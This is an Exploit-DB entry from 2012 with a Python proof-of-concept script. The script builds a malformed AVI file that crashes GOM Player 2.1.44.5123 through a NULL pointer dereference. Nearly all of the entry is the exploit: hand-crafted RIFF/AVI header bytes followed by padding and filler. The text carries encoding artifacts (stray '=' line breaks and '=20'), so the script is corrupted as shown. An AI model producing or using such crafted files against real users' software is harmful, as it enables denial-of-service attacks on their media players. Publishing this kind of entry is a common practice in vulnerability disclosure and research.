Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference

EDB-ID:

21830

CVE:



Author:

wh1ant

Type:

dos


Platform:

Windows

Date:

2012-10-09


# Exploit Title: gom player 2.1.44.5123 (Unicode) NULL pointer dereference =
vulnerability
# Date: 2012.10.09
# Exploit Author: wh1ant
# Software Link: http://app.gomtv.com/gom/GOMPLAYERSETUP.EXE
# Version: 2.1.44.5123 (Unicode)
# Tested on: windows 7 Ultimate k
# Language : python

f = open("hack.avi", "wb")
data =  "\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54=
" \
        "\xc0\x00\x00\x00\x68\x64\x72\x6c\x61\x76\x69\x68\x38\x00\x00\x00" =
\
        "\x6b\x04\x01\x00\x9c\x5e\x07\x00\x00\x00\x00\x00\x10\x08\x00\x00" =
\
        "\x1e\x0a\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xe1\x52\x01\x00" =
\
        "\x40\x01\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
        "\x00\x00\x00\x00\x00\x00\x00\x00\x4c\x49\x53\x54\x74\x00\x00\x00" =
\
        "\x73\x74\x72\x6c\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73" =
\
        "\x74\x73\x63\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
        "\x01\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x1e\x0a\x00\x00" =
\
        "\xe1\x52\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" =
\
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
               =20
f.write(data)

for i in range(0, 0x71a):
    f.write("\x00")

data = "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\=
x3d\x4c\x00"
f.write(data)

#for i in range(0, 0x41):
for i in range(0, 0x41):
    f.write("\x41")
   =20
for i in range(0, 0x41):
    f.write("\x00")
       =20
#for i in range(0, 0x41):
for i in range(0, 0x41):
    f.write("\x41")
   =20
f.write("\x69\x64\x78\x31\xe0\xa1")

f.close()